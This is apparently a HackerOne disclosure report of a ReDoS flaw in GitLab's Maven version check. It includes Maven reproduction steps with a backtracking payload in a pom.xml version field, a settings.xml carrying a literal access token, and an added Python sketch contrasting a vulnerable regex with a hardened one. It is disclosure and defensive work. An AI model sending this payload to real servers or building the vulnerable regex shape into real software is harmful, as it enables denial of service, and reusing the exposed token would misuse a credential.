Maven package version ReDoS
HackerOne report #997961 by anyday
on 2020-10-05, assigned to @ngeorge1:
Report
Hello,
Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking: aaaa....!
(!32925 (merged))
Steps to reproduce:
Follow Maven guide https://docs.gitlab.com/ee/user/packages/maven_repository/
- generate project:
  mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false
- create settings.xml with your access token (e.g. at /root/.m2/settings.xml):
  <settings>
    <servers>
      <server>
        <id>gitlab-maven</id>
        <configuration>
          <httpHeaders>
            <property>
              <name>Private-Token</name>
              <value>srzc2-M3ysZx-ZEKQRki</value>
            </property>
          </httpHeaders>
        </configuration>
      </server>
    </servers>
  </settings>
- edit pom.xml with:
  <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.mycompany.mydepartment</groupId>
    <artifactId>my-project</artifactId>
    <packaging>jar</packaging>
    <version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service -->
    <name>my-project</name>
    <url>http://maven.apache.org</url>
    <dependencies>
      <dependency>
        <groupId>junit</groupId>
        <artifactId>junit</artifactId>
        <version>3.8.1</version>
        <scope>test</scope>
      </dependency>
    </dependencies>
    <properties><!-- Maven was complaining about something -->
      <maven.compiler.source>6</maven.compiler.source>
      <maven.compiler.target>6</maven.compiler.target>
    </properties>
    <repositories><!-- replace(3) 'gitlab.com' and 'PROJECT_ID' -->
      <repository>
        <id>gitlab-maven</id>
        <url>https://gitlab.com/api/v4/packages/maven</url>
      </repository>
    </repositories>
    <distributionManagement>
      <repository>
        <id>gitlab-maven</id>
        <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
      </repository>
      <snapshotRepository>
        <id>gitlab-maven</id>
        <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
      </snapshotRepository>
    </distributionManagement>
  </project>
- run:
  mvn deploy
Video:
mvn_redos.mp4
Impact
Denial of service, CPU exhaustion
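Added example (not the report's or GitLab's code): a Python sketch of the failure class. VULNERABLE_VERSION_RE is a hypothetical version pattern with the nested-quantifier shape that backtracks exponentially on the report's "aaaa...!" payload, not GitLab's actual validator; beside it sits a hardened pattern where each character has only one way to be consumed, plus a length cap. The regex shapes and MAX_VERSION_LEN are assumptions.

```python
import re
import time

# Hypothetical pattern with the classic ReDoS shape (a repeated group whose
# separator is optional). NOT GitLab's real regex: it only illustrates why
# "aaaa...!" is costly. The run of letters can be split into the repeated
# group in 2^(n-1) ways, and every split is tried before the '!' rejects it.
VULNERABLE_VERSION_RE = re.compile(r"(?:[A-Za-z0-9]+[.\-]?)+")

# Hardened form: alphanumeric runs separated by exactly one '.' or '-'.
# The run class and the separator class are disjoint, so the engine never
# has two ways to consume the same character; rejection is linear time.
SAFE_VERSION_RE = re.compile(r"[A-Za-z0-9]+(?:[.\-][A-Za-z0-9]+)*")

# Constructed cap: a cheap first gate, but on its own it is NOT a fix;
# the report's 51-character payload is already exponential.
MAX_VERSION_LEN = 255


def is_valid_version(version: str, pattern: re.Pattern = SAFE_VERSION_RE) -> bool:
    """Return True if `version` passes the length cap and matches `pattern` entirely."""
    if len(version) > MAX_VERSION_LEN:
        return False
    return pattern.fullmatch(version) is not None


def match_seconds(pattern: re.Pattern, text: str) -> float:
    """Wall-clock seconds spent deciding whether `text` matches `pattern`."""
    start = time.perf_counter()
    pattern.fullmatch(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Constructed payloads in the report's shape; keep n small for the
    # vulnerable pattern, its cost roughly doubles with each extra 'a'.
    for n in (14, 16, 18):
        payload = "a" * n + "!/x"
        print(f"n={n:2d} vulnerable={match_seconds(VULNERABLE_VERSION_RE, payload):.4f}s "
              f"safe={match_seconds(SAFE_VERSION_RE, payload):.6f}s")
    print("3.8.1 valid:", is_valid_version("3.8.1"))
```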